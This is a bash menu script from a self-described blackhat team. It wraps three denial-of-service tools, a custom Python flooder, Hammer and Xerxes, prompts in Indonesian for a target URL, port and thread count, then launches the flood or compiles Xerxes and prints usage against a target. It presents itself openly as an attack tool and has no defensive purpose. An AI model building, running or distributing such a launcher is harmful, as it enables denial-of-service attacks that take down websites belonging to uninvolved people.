#########################
#!/usr/bin/bash                                  #
#Author: P47R1K21                          #
#Team  : Bastard Blackhat Family#
#Copyright@2018                             #
#########################

#!/usr/bin/python
# author~: ambari channel
clear
echo "\033[31;1m"
echo """
   +--------------------------------------+
   |author~: P47R1K21                     |
   |team~: Bastard Blackhat Family        |
   |Feat~: Mr.B4J1N64N                    |
   \033[37;1m|Tools~: All In DDOS                   |
   |date~: 14-7-2018                      |
   |YT~: P47R1K21 -{ Official }-          |
   +--------------------------------------+
"""
echo "   \033[36;1m[01] P47R1K21 DDoS"
echo "   [02] Hammer DDoS"
echo "   [03] Xerxes DDoS"
echo ""
echo "   [00] exit"
echo
read -p "[+]Pilih~:> " Patrik;

if [ $Patrik = 01 ] || [ $Patrik = 1 ]
then
sleep 2
echo ""
python2 ¥€¢£.py
fi

if [ $Patrik = 02 ] || [ $Patrik = 2 ]
then
sleep 2
echo ""
echo "\033[31;1m#    Masukan URL Target [ Ex: www.google.com ]\033[37;1m"
read -p "#    [$]Hammer=~> " hammer1;
echo "\033[31;1m#    Masukan PORT [ Ex: 80 ]\033[37;1m"
read -p "#    [$]Hammer=~> " hammer2;
echo "\033[31;1m#    Masukan Turbo [ Ex: 135 ]\033[37;1m"
read -p "#    [$]Hammer=~> " hammer3;
python €£¥¢π√.py -s $hammer1 -p $hammer2 -t $hammer3
fi

if [ $Patrik = 03 ] || [ $Patrik = 3 ]
then
sleep 2
echo ""
clang xerxes.c -o xerxes
echo ""
echo "\033[33;1mUSE=~>   ./xerxes Target.com 80"
fi

if [ $Patrik = 00 ] || [ $Patrik = 0 ]
then
echo ""
echo "\033[32;1mKeluar Dari Tools:)........"
sleep 3
echo "\033[32;1mOke GoodBye:*"
sleep 2
clear
echo ""
fi
